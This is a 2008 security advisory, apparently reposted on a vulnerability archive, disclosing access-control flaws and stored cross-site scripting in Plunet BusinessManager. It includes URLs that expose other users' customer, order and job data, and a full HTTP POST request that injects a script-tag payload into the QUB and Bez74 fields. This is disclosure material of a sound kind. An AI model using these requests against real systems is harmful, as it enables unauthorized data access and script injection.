exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Plunet BusinessManager Information Disclosure / XSS

Plunet BusinessManager Information Disclosure / XSS
Posted Jan 7, 2009
Authored by Gabriele Zanoni, Matteo Ignaccolo | Site securenetwork.it

Plunet BusinessManager suffers from stored cross site scripting and information disclosure vulnerabilities.

tags | exploit, vulnerability, xss, info disclosure
SHA-256 | bbb6b7efc7455a72e4246a17d17484a00d7d0d57b0db5110e8853ccd42f1c704

Plunet BusinessManager Information Disclosure / XSS

Change Mirror Download
Secure Network - Security Research Advisory

Vuln name: Failure in Access Controls; multiple Stored Cross Site Scripting
vulnerabilities.
Systems affected: Plunet BusinessManager
Systems not affected:
Severity: High
Local/Remote: Remote
Vendor URL: http://www.plunet.de
Author(s): Matteo Ignaccolo m.ignaccolo@securenetwork.it - Gabriele Zanoni
g.zanoni@securenetwork.it
Relates to:
Vendor disclosure: 23/09/2008
Vendor acknowledged:
Vendor patch release:
Public disclosure: 23/12/2008
Advisory number: SN-2008-04
Advisory URL: http://www.securenetwork.it/advisories/

*** SUMMARY ***

Plunet BusinessManager is a powerful software for traslation companies, that
offers on a single platform a solution to handle customers, traslators,
document management, data, order management e processing.
Since Plunet BusinessManager suffers of incorrect validation of some input
forms, Stored Cross Site Scripting attacks are allowed.
Moreover customers and traslators can access data and file not related to
them.

*** VULNERABILITY DETAILS ***

The application fails to perform a correct access control to data and file.
Any user (Customers and Traslators) colud retrive and alter data and
file not related to him. Also, an user could be easily enumerate all Company
customers.

The application fails to validate QUB and Bez74 parameters, so stored Cross
Site
Scripting attacks are possible.


*** EXPLOIT ***

An authenticated Customer could use the following URL to access to other
Customers private area.

http://domain/pagesUTF8/Sys_DirAnzeige.jsp?AnzeigeText=&Pfad=/Customer/
<CUSTOMER-ID>

An authenticated Traslator could use the following URL to access Orders not
related to him

http://domain/pagesUTF8/Sys_DirAnzeige.jsp?AnzeigeText=/PRM&Pfad=/ORDER/
C-00042/PRM

An authenticated traslator could use the following URL to access to Jobs not
related to him

http://domain/pagesUTF8/auftrag_job.jsp?OSG05=1944&anchor=AJob31944 surf jobs

Stored Cross Site Scripting

POST /pagesUTF8/auftrag_allgemeinauftrag.jsp HTTP/1.1
Host: <HOSTNAME> or IP
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16)
Gecko/20080718
Ubuntu/8.04 (hardy) Firefox/2.0.0.16
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,
text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://<hostname or IP>/pagesUTF8/auftrag_allgemeinauftrag.jsp
Cookie: JSESSIONID=0B1347DFFD031E6BC1944C381A31293D
Content-Type: application/x-www-form-urlencoded
Content-Length: 1085

TokenUAID=42&QUK=1449&QUKA=*&QUKANSCH=820&QUKLIEFANSCH=820&QUZ=sample&
VorlageID=3&QU02=1-&QUL=sample&QUB=%22%3E%3Cscript%3Ealert%28%22XSS2%22%29
%3B%3C%2Fscript%3E&QUG=sample&OSPK01=141&OSPK02=0&OSSK05=&OSSK09=1&PJ12=14
&DATAUFTT=07&DATAUFMM=01&DATAUFJJJJ=2008&DATLIEFTT=24&DATLIEFMM=01&
DATLIEFJJJJ=2008&DATLIEFHH=&DATLIEFMN=&PJ13=&
Bez74=%22%3E%3Cscript%3Ealert%28%22XSS4%22%29%3B%3C%2Fscript%3E&
LDate74TT=24&LDate74MM=01&LDate74JJJJ=2008&LDate74HH=13&
LDate74MN=00&BOXP74=4&REA01774=59&REA01874=sample&
OutPE0174=0&OutPAP74=8385&Bem74=sample&REA001=&REA010=&REA007=1&REA008=2&
REA011=0&REA013=0&REA015=0&LEISTung=sample&LangFlag=&exit=&SelectTab=
&ContentBox=&OpenContentBox=&LoginPressed=false&SaveButton=true&
CheckXYZ=Send&yOffsetScroll=0


*** FIX INFORMATION ***

No patch is currently available.

*** WORKAROUNDS ***

No workaround is available, but some application firewalls and IPS can be
reconfigured to thwart the attack.

*********************
*** LEGAL NOTICES ***
*********************

Secure Network (www.securenetwork.it) is an information security company,
which provides consulting and training services, and engages in security
research and development.

We are committed to open, full disclosure of vulnerabilities, cooperating
whenever possible with software developers for properly handling disclosure.

This advisory is copyright 2008 Secure Network S.r.l. Permission is
hereby granted for the redistribution of this alert, provided that it is
not altered except by reformatting it, and that due credit is given. It
may not be edited in any way without the express consent of Secure Network
S.r.l. Permission is explicitly given for insertion in vulnerability
databases and similars, provided that due credit is given to Secure Network.

The information in the advisory is believed to be accurate at the time of
publishing based on currently available information. This information is
provided as-is, as a free service to the community by Secure Network
research staff. There are no warranties with regard to this information.
Secure Network does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

If you have any comments or inquiries, or any issue with what is reported
in this advisory, please inform us as soon as possible.

E-mail: securenetwork@securenetwork.it
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
Phone: +39 02 24 12 67 88


--
Dott. Ing. Matteo Ignaccolo

Secure Network S.r.l.
Via Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia
Tel: +39 02.24126788
email: m.ignaccolo@securenetwork.it
web: www.securenetwork.it
--
Dott. Ing. Matteo Ignaccolo

Secure Network S.r.l.
Via Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia
Tel: +39 02.24126788
email: m.ignaccolo@securenetwork.it
web: www.securenetwork.it
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close